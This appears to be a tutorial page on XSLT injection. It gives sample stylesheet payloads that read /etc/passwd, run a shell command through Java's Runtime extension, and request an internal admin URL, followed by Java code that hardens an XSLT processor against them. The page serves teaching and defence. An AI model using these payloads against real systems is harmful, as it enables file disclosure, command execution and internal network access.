XSLT Injection

XSLT Injection is a vulnerability where attackers can inject malicious content into XSLT (Extensible Stylesheet Language Transformations) stylesheets, potentially leading to information disclosure, server-side request forgery, or remote code execution.

How It Works

XSLT transforms XML documents using stylesheet rules. When user input influences XSLT processing or stylesheet content, attackers can inject XSLT elements that access the filesystem, make network requests, or execute code through extension functions.

Information Disclosure

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <!-- Read local file -->
    <xsl:value-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

Code Execution (Java)

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
                version="1.0">
  <xsl:template match="/">
    <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    <xsl:variable name="process" select="rt:exec($rtobject,'whoami')"/>
  </xsl:template>
</xsl:stylesheet>

SSRF via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:value-of select="document('http://internal-server/admin')"/>
  </xsl:template>
</xsl:stylesheet>

Vulnerable Contexts

  • PDF generators using XML/XSLT
  • Document conversion services
  • XML-based reporting systems
  • Content management systems
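
The stylesheets above depend on the processor resolving document() URIs and binding Java extension namespaces. The following is an added example, not code from the original page, showing one way to configure a JAXP TransformerFactory so that both are refused. It assumes the JDK's built-in XSLT processor (JAXP 1.5 or later); the class name HardenedXslt and the embedded stylesheet string are constructed for illustration.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;
import java.io.StringWriter;

public class HardenedXslt {
    // Constructed sample input: the information-disclosure stylesheet from this page.
    static final String UNTRUSTED_XSL =
        "<xsl:stylesheet xmlns:xsl='http://www.w3.org/1999/XSL/Transform' version='1.0'>"
      + "<xsl:template match='/'>"
      + "<xsl:value-of select=\"document('/etc/passwd')\"/>"
      + "</xsl:template></xsl:stylesheet>";

    static TransformerFactory hardenedFactory() throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance();
        // Secure processing turns off Java extension functions (the rt:exec pattern).
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // An empty protocol list forbids external DTDs, xsl:import/xsl:include
        // targets and document() lookups over file:, http: and every other scheme.
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        // Second layer: a resolver that refuses every reference it is asked about.
        tf.setURIResolver((href, base) -> {
            throw new TransformerException("external reference blocked: " + href);
        });
        return tf;
    }

    public static void main(String[] args) {
        try {
            TransformerFactory tf = hardenedFactory();
            Transformer t = tf.newTransformer(new StreamSource(new StringReader(UNTRUSTED_XSL)));
            // Set the resolver on the transformer too, since document() is resolved at run time.
            t.setURIResolver(tf.getURIResolver());
            StringWriter out = new StringWriter();
            t.transform(new StreamSource(new StringReader("<doc/>")), new StreamResult(out));
            // With the settings above, no external content should appear here.
            System.out.println("output: [" + out + "]");
        } catch (TransformerException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Other TransformerFactory implementations may not recognise the ACCESS_EXTERNAL_* attributes and throw IllegalArgumentException from setAttribute, so check the processor actually in use.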
